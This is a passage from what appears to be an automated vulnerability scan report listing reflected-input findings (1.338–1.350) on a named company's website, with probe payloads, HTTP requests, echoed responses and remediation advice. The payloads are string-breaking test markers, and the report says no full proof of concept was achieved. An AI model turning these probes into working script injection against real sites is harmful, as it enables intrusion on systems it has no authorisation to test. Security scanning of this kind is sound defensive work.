GET /about/events7f93c"%3b9bd47f3437f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:58 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47087
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/events7f93c";9bd47f3437f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.338. http://www.verizonbusiness.com/about/events/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/events/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59c62'%3b07c70cfa1b8 was submitted in the REST URL parameter 2. This input was echoed as 59c62';07c70cfa1b8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/events59c62'%3b07c70cfa1b8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:03 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47085
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/events59c62';07c70cfa1b8/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.339. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f43"%3b4fcb26528b9 was submitted in the REST URL parameter 1. This input was echoed as 25f43";4fcb26528b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about25f43"%3b4fcb26528b9/ipinnovation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Date: Wed, 17 Nov 2010 00:52:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about25f43";4fcb26528b9/ipinnovation/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.340. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdbdb'%3b848bffc51b9 was submitted in the REST URL parameter 1. This input was echoed as bdbdb';848bffc51b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutbdbdb'%3b848bffc51b9/ipinnovation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboutbdbdb';848bffc51b9/ipinnovation/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.341. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cb62"%3bad8b6088d was submitted in the REST URL parameter 2. This input was echoed as 3cb62";ad8b6088d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/ipinnovation3cb62"%3bad8b6088d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:06 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47093
Date: Wed, 17 Nov 2010 00:53:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/ipinnovation3cb62";ad8b6088d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.342. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5d44'%3b7e7f0aaf0e9 was submitted in the REST URL parameter 2. This input was echoed as c5d44';7e7f0aaf0e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/ipinnovationc5d44'%3b7e7f0aaf0e9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:24 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47097
Date: Wed, 17 Nov 2010 00:53:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/ipinnovationc5d44';7e7f0aaf0e9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.343. http://www.verizonbusiness.com/about/network/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/network/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eaf4"%3b8654271e773 was submitted in the REST URL parameter 1. This input was echoed as 1eaf4";8654271e773 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about1eaf4"%3b8654271e773/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40626
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about1eaf4";8654271e773/network/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.344. http://www.verizonbusiness.com/about/network/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/network/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e68d'%3b9f6784fa5b0 was submitted in the REST URL parameter 1. This input was echoed as 3e68d';9f6784fa5b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about3e68d'%3b9f6784fa5b0/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about3e68d';9f6784fa5b0/network/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.345. http://www.verizonbusiness.com/about/network/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/network/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1eab'%3b1886eb71e1c was submitted in the REST URL parameter 2. This input was echoed as d1eab';1886eb71e1c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/networkd1eab'%3b1886eb71e1c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47087
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/networkd1eab';1886eb71e1c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.346. http://www.verizonbusiness.com/about/network/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/network/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0ec6"%3b641517e27dc was submitted in the REST URL parameter 2. This input was echoed as e0ec6";641517e27dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/networke0ec6"%3b641517e27dc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47087
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/networke0ec6";641517e27dc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.347. http://www.verizonbusiness.com/about/news/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 846e7'%3b156398fedc was submitted in the REST URL parameter 1. This input was echoed as 846e7';156398fedc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about846e7'%3b156398fedc/news/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40618
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about846e7';156398fedc/news/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.348. http://www.verizonbusiness.com/about/news/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1efb"%3b84767a39647 was submitted in the REST URL parameter 1. This input was echoed as d1efb";84767a39647 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutd1efb"%3b84767a39647/news/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:49 GMT
Content-Type: text/html
Content-Length: 40620
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutd1efb";84767a39647/news/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.349. http://www.verizonbusiness.com/about/news/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2e88"%3b7d712ef7635 was submitted in the REST URL parameter 2. This input was echoed as f2e88";7d712ef7635 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsf2e88"%3b7d712ef7635/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47081
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsf2e88";7d712ef7635/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.350. http://www.verizonbusiness.com/about/news/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62f59'%3b76825451fb8 was submitted in the REST URL parameter 2. This input was echoed as 62f59';76825451fb8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

